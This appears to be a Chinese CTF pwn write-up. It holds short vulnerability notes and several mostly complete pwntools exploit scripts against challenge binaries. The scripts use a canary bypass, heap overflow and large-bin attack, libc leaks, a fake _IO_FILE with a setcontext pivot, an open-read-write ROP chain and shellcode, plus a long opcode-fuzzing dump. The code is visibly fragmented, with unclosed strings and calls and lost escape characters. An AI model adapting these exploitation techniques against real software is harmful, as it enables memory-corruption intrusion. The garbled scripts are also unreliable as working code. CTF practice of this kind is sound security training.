队友分析出来可以绕过 canary, 劫持返回地址到 attack。
# imLZH1
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'x00'))
uu64 = lambda x : u64(x.ljust(8,b'x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('�33[1;31;40m%s -> 0x%x �33[0m' % (x, eval(x)))
attack = ''
binary = './ASU1'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
gdbscript = '''
#io = rmote()
io = start([])
def cmd(a):
sla(b': ',str(a))
def case1(id,name,con):
sa(b'ID: ',id)
sa(b': ',name)
sa(b': ',con)
def detele(id):
sla(b'ID: ',id)
def addfile(name,con):
addfile(b'flag3','x90x90x89xc7x54x5ex0fx05')# 8
addfile(b'flag7',b'x90x90x90x89xc7x54x5ex0fx05') # 9
xxx = '''
mov edi,eax
push rsp
pop rsi
gadget = 0x04028A6
#gdb.attach(io,f'b *{gadget}')
sc1 = asm(sc1)
ru('want to do?')
sc = asm(shellcraft.open('flag'))
sc += asm(shellcraft.read('rax','rsp',0x40))
sc += asm(shellcraft.write(1,'rsp',0x40))
#pay = flat({
这里会heap++ 指针
如果紧接着调用的话,这里的 heap 指针也是++ 后的,基地址发生偏移,从而堆溢出。
后面 large_bin_attack 攻击mp_
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'x00'))
uu64 = lambda x : u64(x.ljust(8,b'x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('�33[1;31;40m%s -> 0x%x �33[0m' % (x, eval(x)))
attack = ''
binary = './SU_text'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
gdbscript = '''
#b *printf
def add(idx,size):
pay = b''
pay += p8(1)
pay += p8(0x10)
pay += p8(idx)
pay += p32(size)
pay += p8(3)
def rm(idx):
pay = b''
pay += p8(1)
pay += p8(0x11)
pay += p8(idx)
pay += p8(3)
def write(idx,offset):
pay = b''
pay += p8(2)
pay += p8(idx)
pay += p8(0x10)
pay += p8(0x16)
pay += p32(offset)
pay += p8(0)
pay += p8(3)
return pay
def heap_to_buf(offset):
pay = b''
pay += p8(2)
pay += p8(0)
pay += p8(0x10)
pay += p8(0x15)
pay += p32(offset)
pay += p64(0) # buf
pay += p8(0)
pay += p8(3)
return pay
def buf_to_heap(idx,offset,data):
pay = b''
pay += p8(2)
pay += p8(idx)
pay += p8(0x10)
pay += p8(0x14)
pay += p32(offset)
pay += p64(data) # buf
pay += p8(0)
pay += p8(3)
return pay
def heap_add(idx,data1,data2):
data1 = data1 & 0xFFFFFFFF
data2 = data2 & 0xFFFFFFFF
pay = b''
pay += p8(2)
pay += p8(idx)
pay += p8(0x10)
pay += p8(0x10)
pay += p32(data1)
pay += p32(data2) # buf
pay += p8(0)
pay += p8(3)
return pay
# game 2 vuln
def s2_xor(idx,data1,data2):
data1 = data1 & 0xFFFFFFFF
data2 = data2 & 0xFFFFFFFF
pay = b''
pay += p8(2)
pay += p8(idx)
pay += p8(0x11)
pay += p8(0x12)
pay += p32(data1)
pay += p32(data2) # buf
pay += p8(0)
pay += p8(3)
return pay
#io = rmote()
io = start([])
#pay = flat({
add(0, 0x418)
add(1, 0x418)
add(0, 0x418)
pay = heap_to_buf(0)[:-1]
pay += write(0,0xffffffe7+8)
libc_base = uu64(r(8)) - 0x203b20
#pay = buf_to_heap(0, 0, libc_base & 0xFFFFFFFF00000000)
pay = buf_to_heap(0, 0, 0)
pay = buf_to_heap(0, 8, 0)
#pay = heap_add(0, 0, libc_base + 0x2031ec)
add(3,0x428) # pad
add(5,0x428) # pad
add(6,0x438) # pad
#gdb.attach(io,gdbscript='brva 0x001752')
target = libc_base + 0x2031ec - 0x20
pay = s2_xor(1, 1, 2)[:-2]
pay += s2_xor(1, 1, 2)[2:-2] * 19
pay += buf_to_heap(0,0x3e8,target)[2:-2]
pay += heap_to_buf(0x3e0)[2:-2]
pay += write(0,0xffffffe7+8+3)[2:]
heap_base = uu64(r(8))
libc.address = libc_base
heap_base += 0x2000
key = heap_base >> 0xC
pay = s2_xor(7, 1, 2)[:-2]
pay += s2_xor(7, 1, 2)[2:-2] * 19
pay += buf_to_heap(7,0x3f0, libc.sym['_IO_2_1_stdout_'] ^ key)[2:]
fake_IO_addr = libc.sym['_IO_2_1_stdout_']
#fake_io = flat({
# 0x00: ' sh;',
# 0x18: libc.sym['setcontext'] +61,
# 0x20: fake_IO_addr, # 0x20 > 0x18
# 0x68: 0, # rdi #read fd
# 0x70: fake_IO_addr, # rsi #read buf
# 0x88: fake_IO_addr + 0x8, # rdx #read size
# 0xa0: fake_IO_addr,
# 0xa8: libc.sym['read'], # RCE2 ogg
# 0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,
# 0xe0: fake_IO_addr,
# },filler=b'x00')
fake_io = flat({
0x00: ' sh;',
0x18: libc.sym['setcontext'] + 61,
0x20: fake_IO_addr, # 0x20 > 0x18
0x68: fake_IO_addr, # rdi #read fd
0x70: 0, # rsi #read buf
0x78: fake_IO_addr, # rsi2 #read buf
0x88: fake_IO_addr + 0x8, # rdx #read size
0x90: 0x400, # rdx2 #read size
0x98: 0x23, # rdx #read size
0xa0: fake_IO_addr,
0xa8: libc.sym['setcontext']+294, # RCE2 ogg
0xb0: libc.sym['read'], # RCE2 ogg
0xd8: libc.sym['_IO_wfile_jumps'] + 0x30 - 0x20,
0xe0: fake_IO_addr,
pay = buf_to_heap(9,0,0)[:-2]
for i in range(0,len(fake_io),8):
p1 = u64(fake_io[i:i+8])
pay += buf_to_heap(9,i,p1)[2:-2]
pay += buf_to_heap(9,i,p1)[-2:]
#gdb.attach(io,gdbscript='b * _IO_switch_to_wget_mode')
libc_rop = ROP(libc)
rax = libc_rop.find_gadget(['pop rax','ret'])[0]
rdi = libc_rop.find_gadget(['pop rdi','ret'])[0]
rsi = libc_rop.find_gadget(['pop rsi','ret'])[0]
#rdx = libc_rop.find_gadget(['pop rdx','ret'])[0]
#rdx = libc_base + 0x0000000000066b9a
r13 = libc_base + 0x000584c9 # pop r13 ; ret
rdx = libc_base + 0x00000000000b00c7 #mov rdx, r13 ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret
#rdx = libc_rop.find_gadget(['pop rdx','pop rbx','ret'])[0]
syscall = libc_rop.find_gadget(['syscall','ret'])[0]
orw_rop_addr = fake_IO_addr
orw_rop = p64(rax) + p64(2) + p64(rdi) + p64(orw_rop_addr+0xd0+0x28) + p64(rsi) + p64(0) + p64(syscall)
orw_rop += p64(rdi) + p64(3) + p64(rsi) + p64(orw_rop_addr+0xd0+0x28) + p64(r13) + p64(0x100) + p64(rdx) + p64(0)*4+ p64(libc.sym['read'])
orw_rop += p64(rdi) + p64(1) + p64(rsi) + p64(orw_rop_addr+0xd0+0x28) + p64(r13) + p64(0x100) + p64(rdx) + p64(0)*4+ p64(libc.sym['write'])
orw_rop += b'/flag'.ljust(0x10,b'x00')
#pay = write(0, 0x10+0x1728)
漏洞点在crete_data, 先赋值data_size,然后再判断的,然后就有了堆溢出的操作。
构造 data_ptr 可以先溢出到 text_ptr
然后稍微爆破的方式把 fd 3,修改成0,
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'x00'))
uu64 = lambda x : u64(x.ljust(8,b'x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('�33[1;31;40m%s -> 0x%x �33[0m' % (x, eval(x)))
attack = ''
#attack = ''
binary = './chall'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
gdbscript = '''
b *0x00401299
#b *0x401F90
#b *0x401FC0
#b *0x401FF0
#b *0x402030
#b *0x402070
#b *0x4020B0
#b *0x4020F0
#b *0x402130
#io = rmote()
io = start([])
def menu(i):
ru('choice >n')
# 1 byte
# 2 text
def add(Type):
def rm(Type):
def create_data(size):
ru(b'Please input the size of the data ocean.n')
def pull_data(size,Type):
ru(b'How much data?n')
ru('2.gate of textn')
ru(b'bytes from the gate:n')
# heap
### 为了调整 堆布局
# edit 0
while 1:
pull_data(0x3a1, 1)
data = ru('**GATES OF DATA**')
x = int(data[:-19][-2:],16)
if x == 0: # edit fd == 0
#pull_data(0x3a1, 1)
ru(b'How much data?n')
ru('2.gate of textn')
pay = '0n' * 0x388
pay = p64(0x3a0)
pay += p64(0x480678)
pay += p64(0x3a0)
pay += p64(0xd7b100000000)
pay += p64(0x1000) # edit size
x = 'n'.join([str(i) for i in list(pay)])
#pay = '0n' * 0x3a0
#pay += 'n'.join([str(i) for i in p64(0xd7b100000000)])
ru(b'How much data?n')
ru('2.gate of textn')
pay = b'1nx00'
pay = pay.ljust(0x118+4,b'A')
pay += p64(0)
pay += p64(0)
pay += p64(0xd7b300000000)
pay += p64(0x1)
#pay += p64(0xd7b200000000)
#pay += p64(0x100)
#pay += p64(0)
#pay += p64(0)
#pay += p64(0)
#pay += p64(0x111111)
#pay += p64(0x41c710)
#pay += p64(0x41c6b0)
#pay += p64(0x41c6b0)
#pay += p64(0x41c660)
# write /bin/sh
ru(b'How much data?n')
ru('2.gate of textn')
pay = flat({
# read
pay += p64(0xd7b100000000)
pay += p64(0x1000)
pay += p64(0)
pay += p64(1)
pay += p64(0)
#pay += p64(0x47e9d0-2)
pay += p64(0x47f920-2) # ptr base
pay += p64(0x41c710)
pay += p64(0x41c680)
pay += p64(0)
pay += p64(0x41c660)
pay += p64(0)
ru(b'How much data?n')
ru('2.gate of textn')
pay = b'/bin/shx00' # /bin/sh -c '/bin/sh'
sl(b'1x00' + pay)
# set offset ,send pay
ru(b'How much data?n')
ru('2.gate of textn')
pay = flat({
pay += p64(0xd7b100000000)
pay += p64(0x1000)
pay += p64(0)
pay += p64(1)
pay += p64(1)
pay += p64(0x47e9a8) # ooo
pay += p64(0x41c710)
pay += p64(0x41c680)
pay += p64(0x424242)
pay += p64(0x41c660)
pay += p64(0x434343)
ru(b'How much data?n')
ru('2.gate of textn')
#gdb.attach(io,'b * 0x41ce1b')
pay = flat({
print('b *0x0456184')
#ru(b'How much data?n')
#ru('2.gate of textn')
#pay = flat({
# 0x398:0
#pay += p64(0xd7b100000000)
#pay += p64(0x1000)
#pay += p64(0)
#pay += p64(1)
#pay += p64(0)
#pay += p64(0x47e9d0-2)
##pay += p64(0x47f920)
#pay += p64(0x41c710)
#pay += p64(0x41c680)
#pay += p64(0)
#pay += p64(0x41c660)
#pay += p64(0)
#for i range()k
#ru(b'How much data?n')
#ru('2.gate of textn')
#pay = flat({
# #0x00:';sh;xb2xd7',
# 0x00:0xd7b200000001,
# 0x08:0x100,
# 0x10:0x0,
# 0x18:0x0,
# 0x20:0x0,
# 0x28:0x414243,
# #0x3:0
#pull_data(0x2a0, 1)
#pull_data(0x200, 2)
把文件patch 一下 然后直接爆出来
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'x00'))
uu64 = lambda x : u64(x.ljust(8,b'x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('�33[1;31;40m%s -> 0x%x �33[0m' % (x, eval(x)))
attack = ''
binary = './chall'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
#context(binary = binary, log_level = 'info',
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
gdbscript = '''
brva 0x02349
brva 0x0274D
#io = rmote()
#pay = flat({
### 0
# hack gsp(0, 1, 0, 0, 0x1111) 0: 66 b8 11 11 mov ax, 0x1111
# hack gsp(0, 1, 1, 0, 0x1111) 0: 66 bb 11 11 mov bx, 0x1111
# hack gsp(0, 1, 2, 0, 0x1111) 0: 66 b9 11 11 mov cx, 0x1111
# hack gsp(0, 1, 3, 0, 0x1111) 0: 66 ba 11 11 mov dx, 0x1111
# hack gsp(0, 0, 0, 0, 0x1111) 0: 66 89 c0 mov ax, ax
# hack gsp(0, 0, 0, 1, 0x1111) 0: 66 89 d8 mov ax, bx
# hack gsp(0, 0, 0, 2, 0x1111) 0: 66 89 c8 mov ax, cx
# hack gsp(0, 0, 0, 3, 0x1111) 0: 66 89 d0 mov ax, dx
# hack gsp(0, 0, 1, 0, 0x1111) 0: 66 89 c3 mov bx, ax
# hack gsp(0, 0, 1, 1, 0x1111) 0: 66 89 db mov bx, bx
# hack gsp(0, 0, 1, 2, 0x1111) 0: 66 89 cb mov bx, cx
# hack gsp(0, 0, 1, 3, 0x1111) 0: 66 89 d3 mov bx, dx
# hack gsp(0, 0, 2, 0, 0x1111) 0: 66 89 c1 mov cx, ax
# hack gsp(0, 0, 2, 1, 0x1111) 0: 66 89 d9 mov cx, bx
# hack gsp(0, 0, 2, 2, 0x1111) 0: 66 89 c9 mov cx, cx
# hack gsp(0, 0, 2, 3, 0x1111) 0: 66 89 d1 mov cx, dx
# hack gsp(0, 0, 3, 0, 0x1111) 0: 66 89 c2 mov dx, ax
# hack gsp(0, 0, 3, 1, 0x1111) 0: 66 89 da mov dx, bx
# hack gsp(0, 0, 3, 2, 0x1111) 0: 66 89 ca mov dx, cx
# hack gsp(0, 0, 3, 3, 0x1111) 0: 66 89 d2 mov dx, dx
### 1
# hack gsp(1, 1, 0, 0, 0x1111) 0: 66 11 c0 adc ax, ax
# hack gsp(1, 1, 0, 1, 0x1111) 0: 66 11 d8 adc ax, bx
# hack gsp(1, 1, 0, 2, 0x1111) 0: 66 11 c8 adc ax, cx
# hack gsp(1, 1, 0, 3, 0x1111) 0: 66 11 d0 adc ax, dx
# hack gsp(1, 1, 1, 0, 0x1111) 0: 66 11 c3 adc bx, ax
# hack gsp(1, 1, 1, 1, 0x1111) 0: 66 11 db adc bx, bx
# hack gsp(1, 1, 1, 2, 0x1111) 0: 66 11 cb adc bx, cx
# hack gsp(1, 1, 1, 3, 0x1111) 0: 66 11 d3 adc bx, dx
# hack gsp(1, 1, 2, 0, 0x1111) 0: 66 11 c1 adc cx, ax
# hack gsp(1, 1, 2, 1, 0x1111) 0: 66 11 d9 adc cx, bx
# hack gsp(1, 1, 2, 2, 0x1111) 0: 66 11 c9 adc cx, cx
# hack gsp(1, 1, 2, 3, 0x1111) 0: 66 11 d1 adc cx, dx
# hack gsp(1, 1, 3, 0, 0x1111) 0: 66 11 c2 adc dx, ax
# hack gsp(1, 1, 3, 1, 0x1111) 0: 66 11 da adc dx, bx
# hack gsp(1, 1, 3, 2, 0x1111) 0: 66 11 ca adc dx, cx
# hack gsp(1, 1, 3, 3, 0x1111) 0: 66 11 d2 adc dx, dx
# hack gsp(1, 0, 0, 0, 0x1111) 0: 66 01 c0 add ax, ax
# hack gsp(1, 0, 0, 1, 0x1111) 0: 66 01 d8 add ax, bx
# hack gsp(1, 0, 0, 2, 0x1111) 0: 66 01 c8 add ax, cx
# hack gsp(1, 0, 0, 3, 0x1111) 0: 66 01 d0 add ax, dx
# hack gsp(1, 0, 1, 0, 0x1111) 0: 66 01 c3 add bx, ax
# hack gsp(1, 0, 1, 1, 0x1111) 0: 66 01 db add bx, bx
# hack gsp(1, 0, 1, 2, 0x1111) 0: 66 01 cb add bx, cx
# hack gsp(1, 0, 1, 3, 0x1111) 0: 66 01 d3 add bx, dx
# hack gsp(1, 0, 2, 0, 0x1111) 0: 66 01 c1 add cx, ax
# hack gsp(1, 0, 2, 1, 0x1111) 0: 66 01 d9 add cx, bx
# hack gsp(1, 0, 2, 2, 0x1111) 0: 66 01 c9 add cx, cx
# hack gsp(1, 0, 2, 3, 0x1111) 0: 66 01 d1 add cx, dx
# hack gsp(1, 0, 3, 0, 0x1111) 0: 66 01 c2 add dx, ax
# hack gsp(1, 0, 3, 1, 0x1111) 0: 66 01 da add dx, bx
# hack gsp(1, 0, 3, 2, 0x1111) 0: 66 01 ca add dx, cx
# hack gsp(1, 0, 3, 3, 0x1111) 0: 66 01 d2 add dx, dx
### 2
# hack gsp(2, 0, 0, 0, 0x1111) 0: 66 29 c0 sub ax, ax
# hack gsp(2, 0, 0, 1, 0x1111) 0: 66 29 d8 sub ax, bx
# hack gsp(2, 0, 0, 2, 0x1111) 0: 66 29 c8 sub ax, cx
# hack gsp(2, 0, 0, 3, 0x1111) 0: 66 29 d0 sub ax, dx
# hack gsp(2, 0, 1, 0, 0x1111) 0: 66 29 c3 sub bx, ax
# hack gsp(2, 0, 1, 1, 0x1111) 0: 66 29 db sub bx, bx
# hack gsp(2, 0, 1, 2, 0x1111) 0: 66 29 cb sub bx, cx
# hack gsp(2, 0, 1, 3, 0x1111) 0: 66 29 d3 sub bx, dx
# hack gsp(2, 0, 2, 0, 0x1111) 0: 66 29 c1 sub cx, ax
# hack gsp(2, 0, 2, 1, 0x1111) 0: 66 29 d9 sub cx, bx
# hack gsp(2, 0, 2, 2, 0x1111) 0: 66 29 c9 sub cx, cx
# hack gsp(2, 0, 2, 3, 0x1111) 0: 66 29 d1 sub cx, dx
# hack gsp(2, 0, 3, 0, 0x1111) 0: 66 29 c2 sub dx, ax
# hack gsp(2, 0, 3, 1, 0x1111) 0: 66 29 da sub dx, bx
# hack gsp(2, 0, 3, 2, 0x1111) 0: 66 29 ca sub dx, cx
# hack gsp(2, 0, 3, 3, 0x1111) 0: 66 29 d2 sub dx, dx
# hack gsp(2, 1, 0, 0, 0x1111) 0: 66 19 c0 sbb ax, ax
# hack gsp(2, 1, 0, 1, 0x1111) 0: 66 19 d8 sbb ax, bx
# hack gsp(2, 1, 0, 2, 0x1111) 0: 66 19 c8 sbb ax, cx
# hack gsp(2, 1, 0, 3, 0x1111) 0: 66 19 d0 sbb ax, dx
# hack gsp(2, 1, 1, 0, 0x1111) 0: 66 19 c3 sbb bx, ax
# hack gsp(2, 1, 1, 1, 0x1111) 0: 66 19 db sbb bx, bx
# hack gsp(2, 1, 1, 2, 0x1111) 0: 66 19 cb sbb bx, cx
# hack gsp(2, 1, 1, 3, 0x1111) 0: 66 19 d3 sbb bx, dx
# hack gsp(2, 1, 2, 0, 0x1111) 0: 66 19 c1 sbb cx, ax
# hack gsp(2, 1, 2, 1, 0x1111) 0: 66 19 d9 sbb cx, bx
# hack gsp(2, 1, 2, 2, 0x1111) 0: 66 19 c9 sbb cx, cx
# hack gsp(2, 1, 2, 3, 0x1111) 0: 66 19 d1 sbb cx, dx
# hack gsp(2, 1, 3, 0, 0x1111) 0: 66 19 c2 sbb dx, ax
# hack gsp(2, 1, 3, 1, 0x1111) 0: 66 19 da sbb dx, bx
# hack gsp(2, 1, 3, 2, 0x1111) 0: 66 19 ca sbb dx, cx
# hack gsp(2, 1, 3, 3, 0x1111) 0: 66 19 d2 sbb dx, dx
### 4
# hack gsp(4, 1, 0, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 0, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 0, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 0, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 1, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 1, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 1, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 1, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 2, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 2, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 2, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 2, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 1, 3, 0, 0x1111) 0: 66 f7 d8 neg ax
# hack gsp(4, 1, 3, 1, 0x1111) 0: 66 f7 db neg bx
# hack gsp(4, 1, 3, 2, 0x1111) 0: 66 f7 d9 neg cx
# hack gsp(4, 1, 3, 3, 0x1111) 0: 66 f7 da neg dx
# hack gsp(4, 2, 0, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 0, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 0, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 0, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 1, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 1, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 1, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 1, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 2, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 2, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 2, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 2, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 2, 3, 0, 0x1111) 0: 66 c1 e8 0f shr ax, 0xf
# hack gsp(4, 2, 3, 1, 0x1111) 0: 66 c1 eb 0f shr bx, 0xf
# hack gsp(4, 2, 3, 2, 0x1111) 0: 66 c1 e9 0f shr cx, 0xf
# hack gsp(4, 2, 3, 3, 0x1111) 0: 66 c1 ea 0f shr dx, 0xf
# hack gsp(4, 4, 0, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 0, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 0, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 0, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 1, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 1, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 1, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 1, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 2, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 2, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 2, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 2, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 4, 3, 0, 0x1111) 0: 66 85 c0 test ax, ax
# hack gsp(4, 4, 3, 1, 0x1111) 0: 66 85 db test bx, bx
# hack gsp(4, 4, 3, 2, 0x1111) 0: 66 85 c9 test cx, cx
# hack gsp(4, 4, 3, 3, 0x1111) 0: 66 85 d2 test dx, dx
# hack gsp(4, 0, 0, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 0, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 0, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 0, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 1, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 1, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 1, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 1, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 2, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 2, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 2, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 2, 3, 0x1111) 0: 66 f7 d2 not dx
# hack gsp(4, 0, 3, 0, 0x1111) 0: 66 f7 d0 not ax
# hack gsp(4, 0, 3, 1, 0x1111) 0: 66 f7 d3 not bx
# hack gsp(4, 0, 3, 2, 0x1111) 0: 66 f7 d1 not cx
# hack gsp(4, 0, 3, 3, 0x1111) 0: 66 f7 d2 not dx
### ....
### ....
def gsp(opcode, cmd1=0, o1=0, o2=0, data=0xbeef):
op = 0
# 0xF
op += cmd1 + (opcode<<4)
op += (o2 + (o1<<4) << 8)
op += (data) << 0x10
return p32(op)
# 0x123406050807
for o1 in range(0x10):
for o2 in range(0x10):
io = start([])
#gdb.attach(io,gdbscript='brva 0x002024')
opcode = 4
cmd1 = 4
pay = gsp(opcode, cmd1, o1, o2, 0x1111)
ru(b'Sorry, I forget to set the memory region writable...n')
data = ru(p64(0))[:-9]
if (data):
print(f'gsp({opcode}, {cmd1}, {o1}, {o2}, 0x1111)','# hack',disasm(data))
from pwn import *
#from ctypes import CDLL
#cdl = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
s = lambda x : io.send(x)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sla = lambda x,y : io.sendlineafter(x,y)
r = lambda x : io.recv(x)
ru = lambda x : io.recvuntil(x)
rl = lambda : io.recvline()
itr = lambda : io.interactive()
uu32 = lambda x : u32(x.ljust(4,b'x00'))
uu64 = lambda x : u64(x.ljust(8,b'x00'))
ls = lambda x : log.success(x)
lss = lambda x : ls('�33[1;31;40m%s -> 0x%x �33[0m' % (x, eval(x)))
attack = ''
binary = './patch/chall'
def start(argv=[], *a, **kw):
if args.GDB:return gdb.debug(binary,gdbscript)
if args.TAG:return remote(*args.TAG.split(':'))
if args.REM:return remote(*attack.split(':'))
return process([binary] + argv, *a, **kw)
#context(binary = binary, log_level = 'info',
context(binary = binary, log_level = 'debug',
terminal='tmux splitw -h -l 170'.split(' '))
libc = context.binary.libc
#elf = ELF(binary)
#libc = ELF('./libc.so.6')
#import socks
#context.proxy = (socks.SOCKS5, '', 10808)
gdbscript = '''
#brva 0x02349
brva 0x01ECF
brva 0x0274D
brva 0x02479
#io = rmote()
#pay = flat({
### 0
# hack gsp(0, 1, 0, 0, 0x1111) 0: 66 b8 11 11 mov ax, 0x1111
# hack gsp(0, 1, 1, 0, 0x1111) 0: 66 bb 11 11 mov bx, 0x1111
# hack gsp(0, 1, 2, 0, 0x1111) 0: 66 b9 11 11 mov cx, 0x1111
# hack gsp(0, 1, 3, 0, 0x1111) 0: 66 ba 11 11 mov dx, 0x1111
# hack gsp(0, 0, 0, 0, 0x1111) 0: 66 89 c0 mov ax, ax
# hack gsp(0, 0, 0, 1, 0x1111) 0: 66 89 d8 mov ax, bx
# hack gsp(0, 0, 0, 2, 0x1111) 0: 66 89 c8 mov ax, cx
# hack gsp(0, 0, 0, 3, 0x1111) 0: 66 89 d0 mov ax, dx
# hack gsp(0, 0, 1, 0, 0x1111) 0: 66 89 c3 mov bx, ax
# hack gsp(0, 0, 1, 1, 0x1111) 0: 66 89 db mov bx, bx
# hack gsp(0, 0, 1, 2, 0x1111) 0: 66 89 cb mov bx, cx
# hack gsp(0, 0, 1, 3, 0x1111) 0: 66 89 d3 mov bx, dx
# hack gsp(0, 0, 2, 0, 0x1111) 0: 66 89 c1 mov cx, ax
# hack gsp(0, 0, 2, 1, 0x1111) 0: 66 89 d9 mov cx, bx
